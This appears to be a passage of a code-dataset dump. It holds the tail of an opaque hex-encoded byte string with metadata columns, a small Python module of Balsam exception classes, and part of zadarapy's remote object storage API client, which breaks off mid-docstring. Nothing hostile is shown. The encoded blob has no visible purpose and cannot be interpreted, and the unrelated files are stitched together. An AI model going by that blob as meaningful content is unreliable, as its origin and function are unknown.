x39\x7b\x97\xa8\x0d\x55\x3c\x70\x20\xd5\x04\x01\x5b\x2d\xa0\xd5\xa6\xf6\xc7\x71\xc2\xea\x78\x8b\x45\x09\x6b\xa7\x8d\x93\x0c\x98\xd8\xbb\x87\x3a\xa4\xf4\x8b\x27\x59\xa5\xab\xa0\x86\x2e\x86\x52\xeb\xce\x5a\xa4\xe5\x53\x44\x17\x1d\xc9\x52\x24\x85\x19\x3e\xe6\x44\x09\xe2\x72\x28\xbe\xa1\xc1\x22\x1b\xbb\xeb\x71\x7c\xfa\xc3\x65\x4b\xcd\xec\xde\xb5\xee\xb9\x8c\xdd\xb6\xb8\xdd\x9f\x52\x0a\xc7\x58\x58\x1c\x6f\xf1\x00\xc0\x6c\x68\x6a\xee\xe1\x60\x48\x4d\x33\x8c\x1a\x4b\xd1\x47\xd3\xa7\x7f\x8c\x5a\x0f\x46\x17\x0a\x35\xf9\x90\xd6\x9e\xfe\x30\x64\xdb\x74\x96\x6d\x7a\xf9\xfd\xb0\x40\x49\xa8\x71\x78\x10\x49\xac\xa3\x3d\xcd\x28\xe3\x50\x5a\x2b\x73\x95\x7c\x85\x31\xe3\x10\x63\x39\x79\x50\x61\xa3\xae\x4f\x42\xbd\x5d\x20\x47\xf0\xee\x2c\x61\xdf\xfe\xad\x6e\x34\x3a\xcd\x85\xc4\x14\xb5\x71\x24\x0c\x1d\xca\x69\xeb\xd0\xbd\x00\xb3\xbd\x82\xb6\xf2\x79\xc1\x8d\x4a\x4b\xd3\x1a\x53\xad\x93\x8a\xd7\x5f\xe2\xe3\x82\x05\x67\x8d\x12\xc3\xf7\x0f\x33\x09\x63\x2f\x16\x7b\x52\x60\x76\xe5\x30\xb7\x42\x44\xff\x41\x60\xf4\xf7\x91\x06\xef\x99\xae\xc6\x01\x8e\x1b\x22\x0b\x6a\x34\xc9\x63\xd5\x9f\x26\x52\xeb\x4e\x9f\xa5\xc0\xc9\xf7\xea\x42\x96\x73\x29\x68\x97\xa0\xf5\x99\x35\x8f\xc0\xcb\x64\x64\xb8\x2a\x4a\xbf\x84\x7b\xf7\x34\x62\x9c\x24\x13\x5a\x75\x9a\xa3\xc5\x1c\x86\xf7\x8e\x50\xee\x03\x45\x61\xe3\xcb\xe2\x76\xc4\xf6\x8d\xf1\x6a\xd2\xed\x14\x4f\xc6\xaa\xce\x92\x76\x70\x45\xa5\xa9\x98\xfb\xad\x02\xa7\x0a\x0d\x95\x5e\xb5\x57\x81\xd8\x5d\x6c\x69\xdd\x87\xd4\x27\x4b\xbf\x06\xbe\x7d\x1c\x6c\x38\x18\x59\x2d\x3e\x04\x7f\x9b\x03\x9d\xfa\x97\x15\x14\x3a\x8e\x37\x05\x3f\xfd\x20\xdf\x37\x79\x4b\xb5\x51\x9d\x1c\x88\xaf\x5d\xb4\x44\xe2\xe9\xba\x2c\xf6\xcd\xef\xd3\x87\xb8\x5f\x08\x4b\xeb\x85\x23\x70\xe0\x5f\x5c\x81\x32\x5d\xd1\x8a\x97\xf7\x74\xac\xa6\x0c\x55\x21\x0c\x52\x5a\x9c\x11\x41\x03\xd2\x84\x40\xc1\x17\xf2\x69\x9e\x02\xf2\x0c\xe8\x4b\xcd\x3c\x81\x9d\xa0\x4b\x0f\x18\x6d\x0b\xa3\x38\x2e\x8f\x55\x97\x94\xf6\x9b\x2d\x32\xa2\x28\xb3\xec\xab\x17\x03\x1d\x77\x57\x3c\x42\x6a\x1a\x21\x6f\x23\xc7\x2b\xd8\x64\xe9\xac\x2f\x17\xa4\xb1\x2c\x6f\x6c\xc6\x09\xc6\x98\x8a\x8a\x7c\x16\x80\x33\x41\xef\xb4\x53\x2e\xd8\x45\xab\x7a\x54\xcb\xf5\x75\xab\xe4\xb5\x78\xa8\x89\x70\xf3\x8a\xaf\x7b\x20\xd8\xbc\xc4\x21\x71\x83\x54\x52\xc3\x46\x88\x1f\xde\xc6\x3b\xac\x5f\xb6\x11\x9e\x6b\x08\x8b\x72\x7c\xd7\x8f\x7b\xce\x10\xb1\x27\x23\x08\x5f\xa3\x34\x94\x3c\xe3\xb0\x0b\xce\x44\xbc\x11\xa0\x4c\x6f\x53\x94\x01\x4b\x9c\x68\x25\xa1\xb6\xca\x0c\x6f\x52\xba\x9e\xce\x46\x9f\x50\xc3\xff\xd4\xdd\x7f\x52\x7b\xcc\x9d\x43\x8d\x8b\xf7\x43\x3d\xaf\xaf\xac\x78\x0b\xc2\xda\x77\x2a\xa4\x3c\xc9\x3d\x0b\xf7\x50\x1c\xcf\xaf\x59\x75\x4a\x7d\x2c\xb0\x12\x77\x4b\x44\x65\x83\xd6\xa9\xb9\xa6\x04\xe4\x02\xc2\x8e\x00\x53\xbe\xb0\xfb\xc1\xd6\x48\x4a\xf3\x28\xb6\x27\x51\x74\xd9\x12\xa1\x90\xce\xfb\x8c\xd7\x4f\xa5\x96\x6d\xce\x65\x98\x99\xc6\xd0\x7f\x84\x85\xb4\xc8\x9d\x8e\x44\x33\xba\x72\x9b\x09\x72\x0f\x5e\xed\x8f\xed\xfd\x12\x80\x4c\x43\x6f\x98\xd4\xb4\x7d\x83\x8a\x33\xca\x00\x45\x57\x27\x8f\x61\x48\x00\x68\x96\xb0\xb6\x06\x67\x22\x80\x41\x94\x1c\x19\x04\x56\x09\x04\x71\x9d\xd8\x4e\x4c\xc4\x7f\x69\xc3\x06\xab\x79\x6a\x1f\x1a\xa3\x71\x1f\x8f\xa3\x3a\x86\x3d\x41\xe4\x4a\x70\x30\x27\x44\xbf\xfc\xae\xe9\x4c\xdf\x58\x55\xcf\x90\x8d\xad\xae\x25\x11\x48\xa5\x6a\x1d\x9e\xc0\x07\xd3\x16\xe1\x7f\x57\xfd\x03\x13\xcb\xba\x89\x54\xfd\xcd\x50\x69\xba\xd0\xaf\x27\x28\xcd\xb9\xae\x62\xde\x19\x66\x70\x69\x03\xb7\x2d\xb4\xcc\x52\x7f\x69\x02\xb9\x22\x76\x14\x91\x43\x0d\xdd\x72\xf0\x04\xed\x0d\xcd\xa9\x0b\x03\x81\x0e\xe7\x2a\x6b\x46\xcc\xbc\x9a\x2a\x0e\xd5\x68\x10\xfb\x99\x6d\xd1\xce\x21\xa0\x2f\xc8\x72\x1b\xef\xba\x20\x0b\xa5\xfa\x3a\xba\x1f\x91\x0e\x7b\xce\x87\x66\xcb\x59\x84\x1b\xea\xc2\x28\x17\xce\xea\xdb\x94\x39\x7b\x68\xb5\x89\x72\x3e\xfa\xd9\x48\xc6\x79\x15\xc3\x66\x44\xa2\xee\xda\xb6\x78\x6b\xb6\x94\x84\x71\x07\xac\x3e\x33\x91\x01\xb4\x1b\x27\xe8\x9b\xa0\xa4\x1c\x7d\x17\x03\xbc\xd0\x09\xd4\x07\x1f\x17\x35\x6c\xa5\x34\x30\x7c\x55\xb5\x9d\x43\x95\x8e\x6f\xc8\xf9\xc2\x14\xb0\xb1\x6c\x8f\xc3\x91\x18\x67\x0f\x36\x25\xb9\x7e\x6c\x02\x0c\x15\x6c\x30\xa8\x85\xa3\x52\xfe\x34\xcd\xec\x6e\x49\xcd\x19\xcc\x42\xd0\x9f\xfc\x1f\x57\xc7\x96\xd6\x0e\xb5\xdf\x02\x4a\xc3\xec\x46\x74\x67\xd8\x9d\x16\x7f\x0b\x6b\x6b\xf5\x9b\x63\xc0\x75\x40\x9b\x40\xf8\x14\xb6\x85\x75\x8a\x9c\xc8\x92\xd6\x0c\x7e\x44\x2c\x55\xfa\x06\x0b\x76\xeb\xb2\xb6\xe3\xa1\x69\x07\x67\xca\x21\x95\x4b\x05\xbd\x65\x65\xbe\xad\xfa\xb5\x91\xd7\x11\xdb\x17\x74\x5a\xe4\xbe\x63\x49\x1e\x6b\x9f\xf1\x50\xfb\xb8\xcd\x2b\x16\xf7\x03\x39\xa8\x31\x6c\xcf\x18\xfc\x6b\x32\xbc\x06\x0c\xab\x6d\xa6\x55\xa5\x73\xd4\x29\x5e\xc5\x84\x14\x25\x61\xe4\x4a\x55\x8b\x62\x55\xce\x27\xe7\x54\x75\x31\xed\x57\x0e\x5f\x40\x41\xf8\xc1\xed\x75\x16\x3b\xe7\xa8\xe8\xa1\x95\x5c\xa2\x33\x8b\x99\x6e\x1d\xbf\x82\x7d\x8e\x93\x6a\xf0\x1a\xa8\xb1\x5b\xb1\x6a\x22\xcd\x9b\xbc\xbd\xd1\xae\xdf\xbc\x22\xdb\x14\x88\x55\xc2\xc3\x7a\xd7\xdc\xc7\xa3\x5a\xb9\x70\x1f\x21\x8b\x35\x8b\x18\x07\x5e\xaf\xf9\x71\x31\xb3\xdb\xce\x5f\x17\x1b\x36\x4e\xa8\x6a\x2b\xb6\x35\xa2\xde\x1e\xa2\xcf\xde\xe5\x69\x1c\xa0\x0f\xa0\x33\x6a\xfe\x59\x5d\x23\xaa\x3f\x2e\x16\x02\x08\x3e\x93\xa1\xaa\x4e\x8c\xd3\x68\x8c\x82\x20\x1e\x1b\x53\x23\x3c\x03\xc3\x06\xfe\x39\x8c\xb0\xf0\x92\x55\x16\x81\x07\x7a\xdb\x81\x42\x9c\xb2\xe2\x93\x32\x30\x63\x6d\x58\xd0\x01\x8b\x9c\xc8\x86\xe6\xd5\xf7\x5a\xff\xbd\x2c\x2f\x99\xd0\x0d\x4e\x3e\xc8\xe8\x12\x28\x10\xbb\x2c\x32\xb6\x6d\x61\xe1\xc4\x35\x02\x53\xce\x32\x98\x7b\x8c\x23\x44\x91\x22\x9d\xd2\xcd\xaf\x5b\xa3\xdd\xd5\xf8\x9b\x8a\x6a\x2a\x63\x0e\x17\x03\x72\x0d\xef\xef\xcf\xf0\x97\x3f\x29\x92\x6b\x63\x1a\x21\x62\x29\xaf\xb8\x20\x1f\x6d\x31\xbd\xfe\x84\x80\xaa\xad\xc0\x9e\xbc\x0e\x0e\xd3\x7e\xbb\x40\x31\xc3\xc7\xb1\x29\x88\x1c\x69\x25\xb1\xe4\x80\x99\x0b\x52\x24\x20\x5d\x64\x7c\x53\xd9\xdd\x05\x2a\x08\xd9\x7c\x9e\x16\xdb\x54\xf8\x72\x5c\xce\xb4\x2b\xc2\x7b\xdb\x41\x74\x23\x80\xe0\x68\xad\x1c\xe6\x71\x36\x3d\x1f\x17\xb9\x36\xbd\x1f\xe1\x98\x0d\x06\x80\x9c\x78\x39\xb6\x03\xca\xa8\x9a\x6d\x1b\x82\x66\x61\x22\x29\x4b\x6a\x1b\x2c\xf7\xc9\x0e\xc1\x7f\xa9\x3f\xdd\x43\x43\x2a\xc7\x56\x3d\x79\x96\xbf\x8d\xc6\xee\x1a\xb7\x21\x7f\x96\x51\x9f\x1b\x81\x06\x61\xb6\xf2\x4a\x26\x98\x48\x54\x15\x6d\xf1\x2e\x93\x0f\xba\x2a\xea\xf0\x97\xb3\xdc\x1f\x35\xf5\xeb\xf7\xa8\x49\x70\x1d\x69\x0e\x3d\x93\xce\xcd\x56\x0d\xa2\x00\xe5\xb4\x5a\x04\xed\x46\xa9\x06\xec\x9c\xc8\x7d\xf5\x31\x75\x9f\x51\x56\x79\xe2\x26\x50\x04\x9b\x99\x60\xcc\x2a\x91\xf5\x60\x53\x63\xae\xcd\xbe\xbf\x02\x3d\x4c\x8e\x1b\x36\x29\x29\x1e\xed\xfa\x18\x3a\x87\x01\xfe\xd6\x76\x48\xd5\x5f\x4b\xc5\xd6\x1b\x82\x06\x21\x69\xac\x40\xaf\x9c\x1f\xeb\xbf\x80\xe5\x5c\x66\xde\x22\x0b\xb3\x6f\xf4\x8b\x94\x1d\xce\xde\x45\x9e\x19\x66\x7c\x53\x55\x49\x98\xa8\x44\xe2\x47\xd4\xfe\xa6\x41\xbc\x93\x4e\xa5\x3f\x99\xb5\x53\x9a\xfa\x4b\x3d\xdc\x24\x18\xe5\x0d\x37\x16\x5c\xe3\x1f\x8e\xa3\x31\xb9\x95\x32\x79\xdb\x4e\x71\xd1\xb3\x1c\x59\x30\xf1\x1b\x29\xab\xc3\x99\xdf\x7a\x92\x84\x03\xce\x36\x5c\x99\x70\xce\xc2\x4a\x07\xa5\x5f\x7b\x5d\x1a\x80\x5d\x58\x64\x53\xdb\xcb\xb8\x14\x7f\x7c\x3d\x7f\x0e\x63\x95\xbd\x71\xf6\x21\x9a\x2b\xd6\x29\x70\x86\x64\x6b\x16\x57\xec\xc6\x99\xe7\xdf\x95\x61\x70\x29\x03\x42\xe8\x3e\xcb\x44\x78\xb0\xdc\x96\xf2\x3b\x98\x33\x7c\x3f\x2a\x75\xaa\x74\xc0\xb7\xf2\x84\xa4\x25\x16\xa9\x35\x7f\x29\xbf\x3d\x73\x4f\x0d\xf4\x22\x32\xa0\xcd\xf5\xe2\x46\x0b\x13\x9c\xf6\xde\x17\xa4\x5f\x3a\xe6\x2d\x7f\x2a\xa9\x30\x68\x46\xa4\x3f\x23\xb6\x5e\x5f\xa8\xe4\xda\xba\xaf\x9e\x41\xc4\xdf\x72\xaa\xe9\xac\x02\xb6\x52\xf3\x9c\x1b\x1a\x85\x86\x72\xe0\x4c\x5e\x11\x63\x81\xbd\xcc\x10\x07\x2e\x29\xa9\x1c\x36\xe9\x18\xc3\xc1\x49\x2b\xfb\x4d\x8f\x89\xb7\x72\x43\x72\x28\x90\xef\x30\x66\x10\xe8\x05\x2a\x9f\x00\xc1\xc8\xa9\x22\x0e\xf6\x12\x92\x29\x8a\x2d\xde\xb8\xaa\x13\x0a\xb8\xf9\x7e\x85\x40\xc8\x18\x6c\xdb\xad\x7d\x4c\xa9\xe3\x3e\xb9\x4b\x87\x8b\xbf\x0a\x0a\xfd\xd0\x43\x51\xee\x48\xb0\xc3\x38\x2c\xc8\x86\xc9\x57\xcf\x54\x7e\x50\xb7\x56\x5e\xdf\x21\x1b\xae\xcd\x4b\x45\x5c\x65\x0d\x9f\xd4\x2c\xf0\xe1\x54\xad\xdc\x46\xec\x21\x09\x09\x29\x69\x77\x6a\x0a\xb2\x02\xc7\xe2\x09\x85\xb4\x5a\x09\xb6\xe5\x0b\x5b\x1e\xf4\x03\x7f\xdb\xd1\x03\x7d\x0b\xd5\xa3\x5c\x7f\x32\xb3\x41\xcb\xd2\x9b\xa9\xb1\x51\x11\xc9\x81\x93\xb2\xe2\x7b\x92\x64\xd1\x42\x08\xeb\x36\x3e\x8b\xa1\x59\xc1\xe8\xc1\x0b\x60\x47\x14\xca\xda\xb6\x6e\x92\x1f\x09\x27\xd7\xc0\x60\xa3\xdc\x0b\x03\x22\xb9\xb4\x8c\xea\x7b\xd5\x09\x88\x28\x7b\xbd\x25\x09\x99\x79\xd9\x59\x9d\x18\x6d\x55\x70\xf0\xe9\x3b\xa3\x17\x2e\x3c\x3a\x32\x06\x32\x20\x8a\xa9\x05\x8f\xba\x21\x92\xa6\xd9\x1d\x1d\x6e\x38\x6e\xb2\xba\x90\xc8\x8f\x3c\xba\x25\x36\xde\x8c\xe3\x4b\xf9\xc7\x54\x47\x45\x97\x3a\x9c\x09\x30\xb3\xd3\x44\xd8\xe2\x09\x8d\xcc\x53\x94\xf4\x49\x05\x2f\xc0\x08\x1c\x0f\xbf\xdb\xd5\x0b\x8a\xad\x21\x6c\x66\x33\xf1\x9e\x33\x92\x38\x20\x5a\x24\x98\x36\x72\x46\x70\xdf\xa5\xdb\x46\x95\xac\x68\xbb\x96\x9e\xcf\x51\xe8\xc9\x03\x96\x6a\x72\xfc\x1f\xec\x21\xc8\xd1\x22\x67\x76\x3b\x4e\xa6\x35\x8f\xb3\x6a\x8a\xaf\xb1\xaa\x89\x91\x21\x4a\x3c\xdf\x02\x0c\xbf\x0c\xe8\x39\x93\xfd\x05\x57\xee\xf1\x5c\x9f\xbb\xe5\xaf\xca\x36\xe6\x90\x39\x74\xed\xab\xcb\x49\xa1\x58\x1e\x8e\x21\x9e\xf9\x8d\xd8\x6e\x66\x67\x64\x04\x1d\x0d\x2a\x8a\x62\x43\x2c\x4e\xe8\xc6\x7d\x1e\x51\xbd\x3d\x57\x40\xb8\x60\x60\xf5\x0a\x3c\xe2\x3e\xdf\x73\xbc\x2a\x7e\x0a\x30\xad\x82\xb3\x0e\x51\x55\x09\x9a\x56\x4a\xd0\x1a\xcf\x0c\xab\x53\x8c\xb8\x6a\x2b\x1d\xb6\x0f\x1d\x6a\x88\x9c\x26\x6d\xf0\x2a\x1c\xa2\x3d\x76\xd0\xd8\x35\x1d\xaa\xbb\x7e\x75\xec\x02\xf6\x21\xa6\x87\xb0\xc7\x2f\x0f\xa7\xc6\xd4\x39\xeb\x41\x9e\xe2\x97\x2b\x22\x3a\x30\x47\x5e\xd8\x6c\x39\x8f\x0f\x47\x03\x5a\x1f\x3b\x47\xad\x05\x18\x97\xb6\x94\x75\x7c\x5a\x35\xac\x5e\x4f\xea\x13\x68\x34\x2d\x1a\x6d\x07\x99\x35\x22\xc3\xe4\x24\x96\x82\x1f\x1e\x7b\x50\x64\x82\x13\x2c\xa7\xba\xb2\x29\x08\x8c\x8f\x15\x72\x17\x28\x1f\xfb\x52\x5d\x87\xaa', 2)
| 11,007
| 11,007
| 0.749977
| 2,747
| 11,007
| 3.000728
| 0.095013
| 0.01383
| 0.014194
| 0.011646
| 0.004731
| 0.002912
| 0.002912
| 0
| 0
| 0
| 0
| 0.315158
| 0.000273
| 11,007
| 1
| 11,007
| 11,007
| 0.433933
| 0
| 0
| 0
| 0
| 1
| 0.996366
| 0.996366
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
674866089ba3f98932590afa9c2af0e8b44255d5
| 201
|
py
|
Python
|
balsam/launcher/exceptions.py
|
Larofeticus/balsam
|
6d646ebe87a21bca5934bbd0b5fdc68a1baea09b
|
[
"BSD-3-Clause"
] | null | null | null |
balsam/launcher/exceptions.py
|
Larofeticus/balsam
|
6d646ebe87a21bca5934bbd0b5fdc68a1baea09b
|
[
"BSD-3-Clause"
] | null | null | null |
balsam/launcher/exceptions.py
|
Larofeticus/balsam
|
6d646ebe87a21bca5934bbd0b5fdc68a1baea09b
|
[
"BSD-3-Clause"
] | null | null | null |
class BalsamLauncherError(Exception): pass
class BalsamTransitionError(Exception): pass
class TransitionNotFoundError(BalsamTransitionError, ValueError): pass
class MPIEnsembleError(Exception): pass
| 28.714286
| 70
| 0.860697
| 17
| 201
| 10.176471
| 0.470588
| 0.225434
| 0.208092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074627
| 201
| 6
| 71
| 33.5
| 0.930108
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
67c716f6c92bf1ac8842ef28a1c1859d2a1fe501
| 47,584
|
py
|
Python
|
zadarapy/vpsa/remote_object_storage.py
|
Stratoscale/zadarapy
|
9df5cabf5f8f251cdda82024b363f3873e6e764d
|
[
"Apache-2.0"
] | null | null | null |
zadarapy/vpsa/remote_object_storage.py
|
Stratoscale/zadarapy
|
9df5cabf5f8f251cdda82024b363f3873e6e764d
|
[
"Apache-2.0"
] | null | null | null |
zadarapy/vpsa/remote_object_storage.py
|
Stratoscale/zadarapy
|
9df5cabf5f8f251cdda82024b363f3873e6e764d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Zadara Storage, Inc.
# Originally authored by Jeremy Brown - https://github.com/jwbrown77
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from zadarapy.validators import verify_snapshot_id, verify_boolean, \
verify_field, verify_start_limit, verify_policy_id, \
verify_ros_backup_job_id, verify_volume_id, verify_pool_id, \
verify_interval, verify_port, verify_ros_destination_id, \
verify_ros_restore_job_id, verify_restore_mode, verify_restore_job_mode
def get_all_ros_destinations(session, start=None, limit=None,
return_type=None, **kwargs):
"""
Retrieves details for all remote object storage destinations configured on
the VPSA.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type start: int
:param start: The offset to start displaying remote object storage
destinations from. Optional.
:type: limit: int
:param limit: The maximum number of remote object storage destinations to
return. Optional.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
parameters = verify_start_limit(start, limit)
path = '/api/object_storage_destinations.json'
return session.get_api(path=path, parameters=parameters,
return_type=return_type, **kwargs)
def get_ros_destination(session, ros_destination_id, return_type=None,
**kwargs):
"""
Retrieves details for a single remote object storage destination.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_destination_id: str
:param ros_destination_id: The remote object storage destination 'name'
value as returned by get_all_ros_destinations. For example:
'obsdst-00000001'. Required.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_destination_id(ros_destination_id)
path = '/api/object_storage_destinations/{0}.json' \
.format(ros_destination_id)
return session.get_api(path=path, return_type=return_type, **kwargs)
def create_ros_destination(session, display_name, bucket, endpoint, username,
password, public, use_proxy, ros_type,
allow_lifecycle_policies=None, proxy_host=None,
proxy_port=None, proxy_username=None,
proxy_password=None, return_type=None, **kwargs):
"""
Creates a remote object storage destination. The VPSA can either connect
directly to the object storage endpoint, or through an HTTP/HTTPS proxy
server.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type display_name: str
:param display_name: A text label to assign to the remote object storage
destination. For example: 'zadarabackup-bucket in AWS East'. May not
contain a single quote (') character. Required.
:type bucket: str
:param bucket: The globally unique destination bucket identifier. For
example: 'zadarabackup-bucket'. May not contain a single quote (')
character. Required.
:type endpoint: str
:param endpoint: The hostname for the object storage endpoint. For
example, for S3 US East: 's3.amazonaws.com'. Required.
:type username: str
:param username: The username or access key ID for the object storage
endpoint. Required.
:type password: str
:param password: The password or secret access key for the object storage
endpoint. Required.
:type public: str
:param public: If set to 'YES', establishing the remote object storage
destination and all future remote object storage jobs occur over the
VPSA's public IP/interface (The VPSA must have a valid public IP and
setup). If 'NO', the relationship and remote object storage jobs will
occur using the same IP as connecting to the storage - in this case
the VPSA must be able to route to the remote object storage
destination in question via the VPSA's defined default gateway.
Required.
:type allow_lifecycle_policies: str
:param allow_lifecycle_policies: If set to 'YES', the VPSA will allow
bucket to have lifecycle policies. (Valid Only for AWS)
:type use_proxy: str
:param use_proxy: If set to 'YES', the VPSA will connect via an HTTP/HTTPS
proxy when addressing the object storage destination. If 'NO', a
direct connection will be used. Required.
:type proxy_host: str
:param proxy_host: When use_proxy is set to 'YES', this defines the DNS
hostname or IP of the HTTP/HTTPS proxy server to use. Optional.
:type proxy_port: str
:param proxy_port: When use_proxy is set to 'YES', this defines the port
number of the HTTP/HTTPS proxy server to use. Optional.
:type proxy_username: str
:param proxy_username: When use_proxy is set to 'YES', this defines the
proxy server username if proxy authentication is required. Optional.
:type proxy_password: str
:param proxy_username: When use_proxy is set to 'YES', this defines the
proxy server password if proxy authentication is required. Optional.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
display_name = verify_field(display_name, "display_name")
bucket = verify_field(bucket, "bucket")
username = verify_field(username, "username")
password = verify_field(password, "password")
public = verify_boolean(public, "public")
use_proxy = verify_boolean(use_proxy, "use_proxy")
allow_lifecycle_policies = verify_boolean(allow_lifecycle_policies,
"allow_lifecycle_policies")
body_values = {'name': display_name, 'bucket': bucket,
'endpoint': endpoint, 'username': username,
'type': ros_type, 'password': password,
'connectVia': 'public' if public == 'YES' else 'be',
'allow_lifecycle_policies': allow_lifecycle_policies}
if use_proxy == 'YES':
body_values['proxyhost'] = proxy_host
body_values['proxyport'] = verify_port(proxy_port)
if proxy_username is not None:
body_values['proxyuser'] = verify_field(proxy_username,
"proxy_username")
if proxy_password is not None:
body_values['proxypassword'] = verify_field(proxy_password,
"proxy_password")
path = '/api/object_storage_destinations.json'
return session.post_api(path=path, body=body_values,
return_type=return_type, **kwargs)
def update_ros_destination(session, ros_destination_id, bucket=None,
endpoint=None, username=None, password=None,
public=None, use_proxy=None, proxy_host=None,
proxy_port=None, proxy_username=None,
proxy_password=None, return_type=None, **kwargs):
"""
Updates options for an existing remote object storage destination.
Parameters set to 'None' will not have their existing values changed.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_destination_id: str
:param ros_destination_id: The remote object storage destination 'name'
value as returned by get_all_ros_destinations. For example:
'obsdst-00000001'. Required.
:type bucket: str
:param bucket: See documentation for create_ros_destination. Optional.
:type endpoint: str
:param endpoint: See documentation for create_ros_destination. Optional.
:type username: str
:param username: See documentation for create_ros_destination. Optional.
:type password: str
:param password: See documentation for create_ros_destination. Optional.
:type public: str
:param public: See documentation for create_ros_destination. Optional.
:type use_proxy: str
:param use_proxy: See documentation for create_ros_destination. Optional.
:type proxy_host: str
:param proxy_host: See documentation for create_ros_destination.
Optional.
:type proxy_port: str
:param proxy_port: See documentation for create_ros_destination.
Optional.
:type proxy_username: str
:param proxy_username: See documentation for create_ros_destination.
Optional.
:type proxy_password: str
:param proxy_username: See documentation for create_ros_destination.
Optional.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_destination_id(ros_destination_id)
body_values = {}
if bucket is not None:
body_values['bucket'] = verify_field(bucket, "bucket")
if endpoint is not None:
body_values['endpoint'] = endpoint
if username is not None:
body_values['username'] = verify_field(username, "username")
if password is not None:
body_values['password'] = verify_field(password, "password")
if public is not None:
public = verify_boolean(public, "public")
body_values['connectVia'] = 'public' if public == 'YES' else 'fe'
if use_proxy is not None:
use_proxy = verify_boolean(use_proxy, "use_proxy")
body_values['use_proxy'] = str(use_proxy == 'YES').lower()
if proxy_host is not None or use_proxy == 'YES':
body_values['proxyhost'] = proxy_host
if proxy_port is not None or use_proxy == 'YES':
body_values['proxyport'] = verify_port(proxy_port)
if proxy_username is not None:
body_values['proxyuser'] = verify_field(proxy_username,
"proxy_username")
if proxy_password is not None:
body_values['proxypassword'] = verify_field(proxy_password,
"proxy_password")
if not body_values:
raise ValueError('At least one of the following must be set: '
'"bucket", "endpoint", "username", "password", '
'"public", "use_proxy", "proxy_host", "proxy_port", '
'"proxy_username", "proxy_password"')
path = '/api/object_storage_destinations/{0}.json' \
.format(ros_destination_id)
return session.put_api(path=path, body=body_values,
return_type=return_type, **kwargs)
def remove_ros_destination(session, ros_destination_id, return_type=None,
**kwargs):
"""
Removes a remote object storage destination. There must not be any remote
object storage backup jobs associated with this destination.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_destination_id: str
:param ros_destination_id: The remote object storage destination 'name'
value as returned by get_all_ros_destinations. For example:
'obsdst-00000001'. Required.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_destination_id(ros_destination_id)
path = '/api/object_storage_destinations/{0}.json' \
.format(ros_destination_id)
return session.delete_api(path=path, return_type=return_type, **kwargs)
def get_all_ros_destination_backup_jobs(session, ros_destination_id,
start=None, limit=None,
return_type=None, **kwargs):
"""
Retrieves details for all remote object storage backup jobs for the
specified remote object storage destination.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
:type ros_destination_id: str
:param ros_destination_id: The remote object storage destination 'name'
value as returned by get_all_ros_destinations. For example:
'obsdst-00000001'. Required.
:type start: int
:param start: The offset to start displaying remote object storage
backup jobs from. Optional.
:type: limit: int
:param limit: The maximum number of remote object storage backup jobs to
return. Optional.
:type return_type: str
:param return_type: If this is set to the string 'json', this function
will return a JSON string. Otherwise, it will return a Python
dictionary. Optional (will return a Python dictionary by default).
:rtype: dict, str
:returns: A dictionary or JSON data set as a string depending on
return_type parameter.
"""
verify_ros_destination_id(ros_destination_id)
path = '/api/object_storage_destinations/{0}/backup_jobs.json' \
.format(ros_destination_id)
parameters = verify_start_limit(start, limit)
return session.get_api(path=path, parameters=parameters,
return_type=return_type, **kwargs)
def get_all_ros_destination_restore_jobs(session, ros_destination_id,
start=None, limit=None,
return_type=None, **kwargs):
"""
Retrieves details for all remote object storage restore jobs for the
specified remote object storage destination.
:type session: zadarapy.session.Session
:param session: A valid zadarapy.session.Session object. Required.
